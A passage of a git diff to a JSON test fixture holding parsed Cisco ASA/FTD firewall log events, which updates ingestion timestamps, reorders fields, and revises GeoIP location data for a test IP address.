TCP connection 111111111 for net:10.10.10.10/53500 (81.2.69.144/53500) to fw111:192.168.2.2/53500 (81.2.69.144/53500)", "code": "302013", "kind": "event", @@ -150,7 +150,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615295400Z", + "ingested": "2021-12-14T14:38:14.656556438Z", "original": "May 5 17:51:17 dev01: %FTD-6-302015: Built inbound UDP connection 111111111 for net:10.10.10.10/53500 (81.2.69.144/53500) to fw111:192.168.2.2/53500 (81.2.69.144/53500)", "code": "302015", "kind": "event", @@ -221,7 +221,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615300100Z", + "ingested": "2021-12-14T14:38:14.656556875Z", "original": "May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 192.168.2.2/0 type 3 code 3", "code": "302020", "kind": "event", @@ -243,16 +243,6 @@ } }, { - "log": { - "level": "debug" - }, - "source": { - "address": "192.168.2.2", - "ip": "192.168.2.2" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "ingress": { "interface": { @@ -276,13 +266,20 @@ "192.168.2.2" ] }, + "log": { + "level": "debug" + }, "host": { "hostname": "dev01" }, + "source": { + "address": "192.168.2.2", + "ip": "192.168.2.2" + }, "event": { "severity": 7, "duration": 0, - "ingested": "2021-12-09T13:33:30.615304900Z", + "ingested": "2021-12-14T14:38:14.656557312Z", "original": "May 5 17:51:17 dev01: %FTD-7-609002: Teardown local-host net:192.168.2.2 duration 0:00:00", "code": "609002", "kind": "event", @@ -301,19 +298,12 @@ "asa": { "source_interface": "net" } - } - }, - { - "log": { - "level": "debug" - }, - "source": { - "address": "192.168.2.2", - "ip": "192.168.2.2" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "ingress": { "interface": { @@ -337,12 +327,19 @@ "192.168.2.2" ] }, + "log": { + "level": "debug" + }, "host": { "hostname": "dev01" }, + "source": { + "address": "192.168.2.2", + "ip": "192.168.2.2" + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:30.615308900Z", + "ingested": "2021-12-14T14:38:14.656557671Z", "original": "May 5 17:51:17 dev01: %FTD-7-609001: Built local-host net:192.168.2.2", "code": "609001", "kind": "event", @@ -359,7 +356,10 @@ "asa": { "source_interface": "net" } - } + }, + "tags": [ + "preserve_original_event" + ] }, { "log": { @@ -408,7 +408,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615312700Z", + "ingested": "2021-12-14T14:38:14.656558035Z", "original": "May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 192.168.2.2/0 type 3 code 1", "code": "302020", "kind": "event", @@ -490,7 +490,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615317400Z", + "ingested": "2021-12-14T14:38:14.656558405Z", "original": "May 5 17:51:17 dev01: %FTD-6-805001: Offloaded TCP Flow for connection 111111111 from fw111:10.10.10.10/111 (81.2.69.144/111) to fw111:192.168.2.2/111 (81.2.69.144/111)", "code": "805001", "kind": "event", @@ -569,7 +569,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615321Z", + "ingested": "2021-12-14T14:38:14.656558798Z", "original": "May 5 17:51:17 dev01: %FTD-6-805002: TCP Flow is no longer offloaded for connection 941243214 from net:10.192.18.4/51261 (10.192.18.4/51261) to fw109:10.192.70.66/443 (10.192.70.66/443)", "code": "805002", "kind": "event", @@ -643,7 +643,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:30.615326500Z", + "ingested": "2021-12-14T14:38:14.656559228Z", "original": "May 5 17:51:17 dev01: %FTD-7-710005: UDP request discarded from 192.168.2.2/68 to fw111:10.10.10.10/67", "code": "710005", "kind": "event", @@ -725,7 +725,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615332400Z", + "ingested": "2021-12-14T14:38:14.656559584Z", "original": "May 5 17:51:17 dev01: %FTD-6-303002: FTP connection from net:192.168.2.2/63656 to fw111:10.192.18.4/21, user testuser Stored file /export/home/sysm/ftproot/sdsdsds/tmp.log", "code": "303002", "kind": "event", @@ -768,7 +768,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:30.615337300Z", + "ingested": "2021-12-14T14:38:14.656559946Z", "original": "May 5 17:51:17 dev01: %FTD-7-710006: VRRP request discarded from 192.168.2.2 to fw111:192.18.4", "code": "710006", "kind": "event", @@ -788,16 +788,6 @@ ] }, { - "log": { - "level": "warning" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "iana_number": "1", - "transport": "icmp" - }, "observer": { "ingress": { "interface": { @@ -818,12 +808,15 @@ "dev01" ] }, + "log": { + "level": "warning" + }, "host": { "hostname": "dev01" }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:30.615341400Z", + "ingested": "2021-12-14T14:38:14.656560498Z", "original": "May 5 17:51:17 dev01: %FTD-4-313005: No matching connection for ICMP error message: icmp src fw111:10.192.33.100 dst fw111:192.18.4 (type 3, code 3) on fw111 interface. Original IP payload: udp src 192.18.4/53 dst 81.2.69.144/10872.", "code": "313005", "kind": "event", @@ -839,6 +832,13 @@ "asa": { "source_interface": "fw111" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "iana_number": "1", + "transport": "icmp" } }, { @@ -888,7 +888,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615346400Z", + "ingested": "2021-12-14T14:38:14.656560893Z", "original": "May 5 18:16:21 dev01: %ASA-6-302021: Teardown ICMP connection for faddr 192.168.2.2/0 gaddr 81.2.69.144/2 laddr 10.10.10.10/2 type 8 code 0", "code": "302021", "kind": "event", @@ -910,16 +910,6 @@ } }, { - "log": { - "level": "debug" - }, - "source": { - "address": "10.10.10.10", - "ip": "10.10.10.10" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "ingress": { "interface": { @@ -943,12 +933,19 @@ "10.10.10.10" ] }, + "log": { + "level": "debug" + }, "host": { "hostname": "dev01" }, + "source": { + "address": "10.10.10.10", + "ip": "10.10.10.10" + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:30.615366600Z", + "ingested": "2021-12-14T14:38:14.656561306Z", "original": "May 5 18:22:35 dev01: %ASA-7-609001: Built local-host net:10.10.10.10", "code": "609001", "kind": "event", @@ -965,19 +962,12 @@ "asa": { "source_interface": "net" } - } - }, - { - "log": { - "level": "debug" - }, - "source": { - "address": "10.10.10.10", - "ip": "10.10.10.10" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "ingress": { "interface": { @@ -1001,13 +991,20 @@ "10.10.10.10" ] }, + "log": { + "level": "debug" + }, "host": { "hostname": "dev01" }, + "source": { + "address": "10.10.10.10", + "ip": "10.10.10.10" + }, "event": { "severity": 7, "duration": 0, - "ingested": "2021-12-09T13:33:30.615371800Z", + "ingested": "2021-12-14T14:38:14.656561665Z", "original": "May 5 18:24:31 dev01: %ASA-7-609002: Teardown local-host identity:10.10.10.10 duration 0:00:00", "code": "609002", "kind": "event", @@ -1026,7 +1023,10 @@ "asa": { "source_interface": "identity" } - } + }, + "tags": [ + "preserve_original_event" + ] }, { "log": { @@ -1075,7 +1075,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615376200Z", + "ingested": "2021-12-14T14:38:14.656562023Z", "original": "May 5 18:29:32 dev01: %ASA-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 10.192.46.90/0", "code": "302020", "kind": "event", @@ -1141,7 +1141,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615380200Z", + "ingested": "2021-12-14T14:38:14.656562486Z", "original": "May 5 18:29:32 dev01: %ASA-6-302020: Built outbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 192.168.2.2/0 type 3 code 3", "code": "302020", "kind": "event", @@ -1220,7 +1220,7 @@ "severity": 6, "duration": 0, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:33:30.615384900Z", + "ingested": "2021-12-14T14:38:14.656562896Z", "original": "May 5 18:29:32 dev01: %ASA-6-302014: Teardown TCP connection 2960892904 for out111:10.10.10.10/443 to fw111:192.168.2.2/55225 duration 0:00:00 bytes 0 TCP Reset-I", "code": "302014", "kind": "event", @@ -1306,7 +1306,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615389300Z", + "ingested": "2021-12-14T14:38:14.656563247Z", "original": "May 5 18:29:32 dev01: %ASA-6-302013: Built outbound TCP connection 1588662 for intfacename:192.168.2.2/80 (81.2.69.144/80) to net:10.10.10.10/54839 (81.2.69.144/54839)", "code": "302013", "kind": "event", @@ -1386,7 +1386,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:30.615393400Z", + "ingested": "2021-12-14T14:38:14.656563602Z", "original": "May 5 18:29:32 dev01: %ASA-6-302012: Teardown dynamic UDP translation from fw111:10.10.10.10/54230 to out111:192.168.2.2/54230 duration 0:00:00", "code": "302012", "kind": "event", @@ -1456,7 +1456,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:30.615397100Z", + "ingested": "2021-12-14T14:38:14.656563959Z", "original": "May 5 18:40:50 dev01: %ASA-4-313004: Denied ICMP type=0, from laddr 10.10.10.10 on interface fw502 to 192.168.2.2: no matching session", "code": "313004", "kind": "event", @@ -1532,7 +1532,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615401300Z", + "ingested": "2021-12-14T14:38:14.656564314Z", "original": "May 5 18:40:50 dev01: %ASA-6-305011: Built dynamic TCP translation from fw111:10.10.10.10/57006 to out111:192.168.2.2/57006", "code": "305011", "kind": "event", @@ -1602,7 +1602,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:33:30.615404900Z", + "ingested": "2021-12-14T14:38:14.656564730Z", "original": "May 5 18:40:50 dev01: %ASA-2-106001: Inbound TCP connection denied from 192.168.2.2/43803 to 10.10.10.10/14322 flags SYN on interface out111", "code": "106001", "kind": "event", @@ -1679,7 +1679,7 @@ "event": { "severity": 2, "duration": 124000000000, - "ingested": "2021-12-09T13:33:30.615409Z", + "ingested": "2021-12-14T14:38:14.656565191Z", "original": "May 5 18:40:50 dev01: %ASA-2-302016: Teardown UDP connection 1671727 for intfacename:10.10.10.10/161 to net:1192.168.2.2/53356 duration 0:02:04 bytes 64585", "code": "302016", "kind": "event", @@ -1765,7 +1765,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:33:30.615413600Z", + "ingested": "2021-12-14T14:38:14.656565549Z", "original": "May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (81.2.69.144/161) to net:192.168.2.2/22638 (81.2.69.144/22638)", "code": "302015", "kind": "event", @@ -1852,7 +1852,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:33:30.615418900Z", + "ingested": "2021-12-14T14:38:14.656565915Z", "original": "May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (81.2.69.144/161) to net:192.168.2.2/22638 (81.2.69.144/22638)", "code": "302015", "kind": "event", @@ -1931,7 +1931,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:30.615423800Z", + "ingested": "2021-12-14T14:38:14.656566278Z", "original": "May 5 18:40:50 dev01: %ASA-4-106023: Deny tcp src fw111:10.10.10.10/64388 dst out111:192.168.2.2/443 by access-group \"out1111_access_out\" [0x47e21ef4, 0x47e21ef4]", "code": "106023", "kind": "event", @@ -2001,7 +2001,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:30.615429400Z", + "ingested": "2021-12-14T14:38:14.656566701Z", "original": "May 5 18:40:50 dev01: %ASA-4-106021: Deny TCP reverse path check from 192.168.2.2 to 10.10.10.10 on interface fw111", "code": "106021", "kind": "event", @@ -2072,7 +2072,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:33:30.615435100Z", + "ingested": "2021-12-14T14:38:14.656567072Z", "original": "May 5 19:02:58 dev01: %ASA-2-106006: Deny inbound UDP from 192.168.2.2/65020 to 10.10.10.10/65020 on interface fw111", "code": "106006", "kind": "event", @@ -2142,7 +2142,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615440700Z", + "ingested": "2021-12-14T14:38:14.656567443Z", "original": "May 5 19:02:58 dev01: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.2/53089 to 10.10.10.10/443 flags FIN PSH ACK on interface out111", "code": "106015", "kind": "event", @@ -2212,7 +2212,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615446300Z", + "ingested": "2021-12-14T14:38:14.656567794Z", "original": "May 5 19:02:58 dev01: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.2/17127 to 10.10.10.10/443 flags PSH ACK on interface out111", "code": "106015", "kind": "event", @@ -2282,7 +2282,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615469500Z", + "ingested": "2021-12-14T14:38:14.656568143Z", "original": "May 5 19:02:58 dev01: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.2/24223 to 10.10.10.10/443 flags RST on interface fw111", "code": "106015", "kind": "event", @@ -2357,7 +2357,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615475600Z", + "ingested": "2021-12-14T14:38:14.656568566Z", "original": "May 5 19:02:58 dev01: %ASA-6-302022: Built director stub TCP connection for fw1111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (81.2.69.144/10051)", "code": "302022", "kind": "event", @@ -2431,7 +2431,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615479800Z", + "ingested": "2021-12-14T14:38:14.656568916Z", "original": "May 5 19:02:58 dev01: %ASA-6-302022: Built forwarder stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (81.2.69.144/10051)", "code": "302022", "kind": "event", @@ -2505,7 +2505,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615484Z", + "ingested": "2021-12-14T14:38:14.656569377Z", "original": "May 5 19:02:58 dev01: %ASA-6-302022: Built backup stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.1682.2.2/10051 (81.2.69.144/10051)", "code": "302022", "kind": "event", @@ -2582,7 +2582,7 @@ "severity": 6, "duration": 0, "reason": "Cluster flow with CLU closed on owner", - "ingested": "2021-12-09T13:33:30.615488100Z", + "ingested": "2021-12-14T14:38:14.656569732Z", "original": "May 5 19:02:58 dev01: %ASA-6-302023: Teardown stub TCP connection for fw111:10.10.10.10/39210 to net:192.168.2.2/10051 duration 0:00:00 forwarded bytes 0 Cluster flow with CLU closed on owner", "code": "302023", "kind": "event", @@ -2661,7 +2661,7 @@ "severity": 6, "duration": 0, "reason": "Forwarding or redirect flow removed to create director or backup flow", - "ingested": "2021-12-09T13:33:30.615492300Z", + "ingested": "2021-12-14T14:38:14.656570104Z", "original": "May 5 19:02:58 dev01: %ASA-6-302023: Teardown stub TCP connection for net:10.10.10.10/10051 to unknown:192.168.2.2/39222 duration 0:00:00 forwarded bytes 0 Forwarding or redirect flow removed to create director or backup flow", "code": "302023", "kind": "event", @@ -2712,7 +2712,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:30.615496100Z", + "ingested": "2021-12-14T14:38:14.656570537Z", "original": "May 5 19:03:27 dev01: %ASA-7-111009: User 'aaaa' executed cmd: show access-list fw211111_access_out brief", "code": "111009", "kind": "event", @@ -2763,7 +2763,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:30.615499900Z", + "ingested": "2021-12-14T14:38:14.656570887Z", "original": "May 5 19:02:26 dev01: %ASA-7-111009: User 'aaaa' executed cmd: show access-list aaa_out brief", "code": "111009", "kind": "event", @@ -2839,7 +2839,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615503800Z", + "ingested": "2021-12-14T14:38:14.656571239Z", "original": "May 5 19:02:26 dev01: %ASA-6-106100: access-list fw111_out permitted tcp ptaaac/192.168.2.2(62157) -\u003e fw111/10.10.10.10(3452) hit-cnt 1 first hit [0x38ff326b, 0x00000000]", "code": "106100", "kind": "event", @@ -2916,7 +2916,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615508400Z", + "ingested": "2021-12-14T14:38:14.656571601Z", "original": "May 5 19:02:26 dev01: %ASA-6-106100: access-list fw111_out permitted tcp net/192.168.2.2(49033) -\u003e fw111/10.10.10.10(6007) hit-cnt 2 300-second interval [0x38ff326b, 0x00000000]", "code": "106100", "kind": "event", @@ -2962,7 +2962,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615512600Z", + "ingested": "2021-12-14T14:38:14.656572024Z", "original": "May 5 19:02:26 dev01: %ASA-6-302027: Teardown stub ICMP connection for fw1111:10.10.10.10/6426 to net:192.168.2.2/0 duration 1:00:04 forwarded bytes 56 Cluster flow with CLU closed on owner", "code": "302027", "kind": "event", @@ -3005,7 +3005,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615517800Z", + "ingested": "2021-12-14T14:38:14.656572384Z", "original": "May 5 19:02:26 dev01: %ASA-6-302026: Built director stub ICMP connection for fw111:10.10.10.10/32004 (8.8.8.5) to net:192.168.2.2/0 (81.2.69.144)", "code": "302026", "kind": "event", @@ -3074,7 +3074,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:30.615522100Z", + "ingested": "2021-12-14T14:38:14.656572741Z", "original": "May 5 19:02:26 dev01: %ASA-7-710005: UDP request discarded from 10.10.10.10/1985 to net:192.168.2.2/1985", "code": "710005", "kind": "event", @@ -3118,7 +3118,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615526400Z", + "ingested": "2021-12-14T14:38:14.656573101Z", "original": "May 5 19:02:26 dev01: %ASA-6-302025: Teardown stub UDP connection for net:192.168.2.2/123 to unknown:10.10.10.10/123 duration 0:01:00 forwarded bytes 48 Cluster flow with CLU removed from due to idle timeout", "code": "302025", "kind": "event", @@ -3161,7 +3161,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615531Z", + "ingested": "2021-12-14T14:38:14.656573449Z", "original": "May 5 19:02:26 dev01: %ASA-6-302024: Built backup stub UDP connection for net:192.168.2.2/9051 (8.8.8.5(19051) to fw111:10.10.10.10/123 (81.2.69.144/123)", "code": "302024", "kind": "event", @@ -3233,7 +3233,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:33:30.615535800Z", + "ingested": "2021-12-14T14:38:14.656573880Z", "original": "May 5 19:02:26 dev01: %ASA-3-106014: Deny inbound icmp src fw111:10.10.10.10 dst fw111:10.10.10.10(type 8, code 0)", "code": "106014", "kind": "event", @@ -3278,7 +3278,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:30.615541700Z", + "ingested": "2021-12-14T14:38:14.656574236Z", "original": "May 5 19:02:25 dev01: %ASA-4-733100: [192.168.2.2] drop rate-1 exceeded. Current burst rate is 0 per second, max configured rate is -4; Current average rate is 7 per second, max configured rate is -4; Cumulative total count is 9063", "code": "733100", "kind": "event", @@ -3361,7 +3361,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:33:30.615546400Z", + "ingested": "2021-12-14T14:38:14.656574597Z", "original": "May 5 19:02:25 dev01: %ASA-3-106010: Deny inbound sctp src fw111:10.10.10.10/5114 dst fw111:10.10.10.10/2", "code": "106010", "kind": "event", @@ -3437,7 +3437,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:30.615551500Z", + "ingested": "2021-12-14T14:38:14.656574953Z", "original": "May 5 19:02:25 dev01: %ASA-4-507003: tcp flow from fw111:10.10.10.10/49574 to out111:192.168.2.2/80 terminated by inspection engine, reason - disconnected, dropped packet.", "code": "507003", "kind": "event", @@ -3500,7 +3500,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:30.615555400Z", + "ingested": "2021-12-14T14:38:14.656575409Z", "original": "Apr 27 04:18:49 dev01: %ASA-5-304001: 10.20.30.40 Accessed URL 10.20.30.40:http://10.20.30.40/", "code": "304001", "kind": "event", @@ -3562,7 +3562,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:30.615560100Z", + "ingested": "2021-12-14T14:38:14.656575862Z", "original": "Apr 27 04:18:49 dev01: %ASA-5-304001: 10.20.30.40 Accessed URL someuser@10.20.30.40:http://10.20.30.40/IOFUHSIU98[0]", "code": "304001", "kind": "event", @@ -3624,7 +3624,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:30.615565100Z", + "ingested": "2021-12-14T14:38:14.656576220Z", "original": "Apr 27 17:54:52 dev01: %ASA-5-304001: 10.20.30.40 Accessed JAVA URL 10.20.30.40:http://10.20.30.40/some/longer/url-asd-er9789870[0]_=23", "code": "304001", "kind": "event", @@ -3686,7 +3686,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:30.615568800Z", + "ingested": "2021-12-14T14:38:14.656576585Z", "original": "Apr 27 04:18:49 dev01: %ASA-5-304001: 10.20.30.40 Accessed JAVA URL someuser@10.20.30.40:http://10.20.30.40/", "code": "304001", "kind": "event", @@ -3711,20 +3711,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -3734,20 +3728,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -3797,7 +3785,7 @@ "severity": 6, "duration": 3602000000000, "reason": "Connection timeout", - "ingested": "2021-12-09T13:33:30.615573200Z", + "ingested": "2021-12-14T14:38:14.656577035Z", "original": "Apr 27 04:12:23 dev01: %ASA-6-302304: Teardown TCP state-bypass connection 2751765169 from server.deflan:81.2.69.144/54242 to server.deflan:81.2.69.144/9101 duration 1:00:02 bytes 245 Connection timeout", "code": "302304", "kind": "event", @@ -3875,7 +3863,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:30.615577900Z", + "ingested": "2021-12-14T14:38:14.656577395Z", "original": "Apr 27 02:02:02 dev01: %ASA-4-106023: Deny tcp src outside:10.10.10.2/56444 dst srv:192.168.2.2/51635(testhostname.domain) by access-group \"global_access_1\"", "code": "106023", "kind": "event", @@ -3952,7 +3940,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:30.615582100Z", + "ingested": "2021-12-14T14:38:14.656577804Z", "original": "Oct 20 2019 15:15:15 dev01: %ASA-5-106100: access-list testrulename denied tcp insideintf/somedomainname.local(27218) -\u003e OUTSIDE/192.168.157.61(53) hit-cnt 1 first hit [0x16847359, 0x00000000]", "code": "106100", "kind": "event", @@ -3975,16 +3963,6 @@ } }, { - "log": { - "level": "notification" - }, - "source": { - "address": "console", - "domain": "console" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "dev01", "product": "asa", @@ -4001,12 +3979,19 @@ "console" ] }, + "log": { + "level": "notification" + }, "host": { "hostname": "dev01" }, + "source": { + "address": "console", + "domain": "console" + }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:30.615587400Z", + "ingested": "2021-12-14T14:38:14.656578161Z", "original": "Apr 27 02:03:03 dev01: %ASA-5-111004: console end configuration: OK", "code": "111004", "kind": "event", @@ -4022,19 +4007,12 @@ }, "cisco": { "asa": {} - } - }, - { - "log": { - "level": "notification" - }, - "source": { - "address": "10.10.0.87", - "ip": "10.10.0.87" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "dev01", "product": "asa", @@ -4056,15 +4034,22 @@ "10.10.0.87" ] }, + "log": { + "level": "notification" + }, "host": { "user": { "name": "enable_15" }, "hostname": "dev01" }, + "source": { + "address": "10.10.0.87", + "ip": "10.10.0.87" + }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:30.615592700Z", + "ingested": "2021-12-14T14:38:14.656578516Z", "original": "Apr 27 02:03:03 dev01: %ASA-5-111010: User 'enable_15', running 'CLI' from IP 10.10.0.87, executed 'clear'", "code": "111010", "kind": "event", @@ -4080,7 +4065,10 @@ "asa": { "command_line_arguments": "'clear'" } - } + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { @@ -4112,7 +4100,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:30.615597300Z", + "ingested": "2021-12-14T14:38:14.656578868Z", "original": "Apr 27 02:03:03 dev01: %ASA-5-502103: User priv level changed: Uname: enable_15 From: 1 To: 15", "code": "502103", "kind": "event", @@ -4190,7 +4178,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615601800Z", + "ingested": "2021-12-14T14:38:14.656579221Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-605004: Login denied from 10.10.1.212/51923 to FCD-FS-LAN:10.10.1.254/https for user \"*****\"", "code": "605004", "kind": "event", @@ -4211,16 +4199,6 @@ } }, { - "log": { - "level": "informational" - }, - "source": { - "address": "10.10.0.87", - "ip": "10.10.0.87" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "dev01", "product": "asa", @@ -4242,15 +4220,22 @@ "10.10.0.87" ] }, + "log": { + "level": "informational" + }, "host": { "user": { "name": "admin" }, "hostname": "dev01" }, + "source": { + "address": "10.10.0.87", + "ip": "10.10.0.87" + }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615606600Z", + "ingested": "2021-12-14T14:38:14.656579646Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-611102: User authentication failed: IP address: 10.10.0.87, Uname: admin", "code": "611102", "kind": "event", @@ -4265,7 +4250,10 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "log": { @@ -4321,7 +4309,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615611800Z", + "ingested": "2021-12-14T14:38:14.656580022Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-605005: Login permitted from 10.10.0.87/6651 to FCD-FS-LAN:10.10.1.254/ssh for user \"admin\"", "code": "605005", "kind": "event", @@ -4342,16 +4330,6 @@ } }, { - "log": { - "level": "informational" - }, - "source": { - "address": "10.10.0.87", - "ip": "10.10.0.87" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "dev01", "product": "asa", @@ -4373,15 +4351,22 @@ "10.10.0.87" ] }, + "log": { + "level": "informational" + }, "host": { "user": { "name": "admin" }, "hostname": "dev01" }, + "source": { + "address": "10.10.0.87", + "ip": "10.10.0.87" + }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.615615400Z", + "ingested": "2021-12-14T14:38:14.656580388Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-611101: User authentication succeeded: IP address: 10.10.0.87, Uname: admin", "code": "611101", "kind": "event", @@ -4396,37 +4381,12 @@ }, "cisco": { "asa": {} - } - }, - { - "log": { - "level": "notification" - }, - "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "Oxfordshire", - "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" - } - }, - "address": "81.2.69.144", - "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "dev01", "product": "asa", @@ -4445,12 +4405,31 @@ "81.2.69.144" ] }, + "log": { + "level": "notification" + }, "host": { "hostname": "dev01" }, + "source": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "GB-ENG", + "city_name": "London", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "England", + "location": { + "lon": -0.0931, + "lat": 51.5142 + } + }, + "address": "81.2.69.144", + "ip": "81.2.69.144" + }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:30.615620200Z", + "ingested": "2021-12-14T14:38:14.656580757Z", "original": "Apr 27 02:03:03 dev01: %ASA-5-713049: Group = 81.2.69.144, IP = 81.2.69.144, Security negotiation complete for LAN-to-LAN Group (81.2.69.144) Responder, Inbound SPI = 0x276b1da2, Outbound SPI = 0x0e1a581d", "code": "713049", "kind": "event", @@ -4464,7 +4443,10 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "log": { @@ -4473,20 +4455,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": 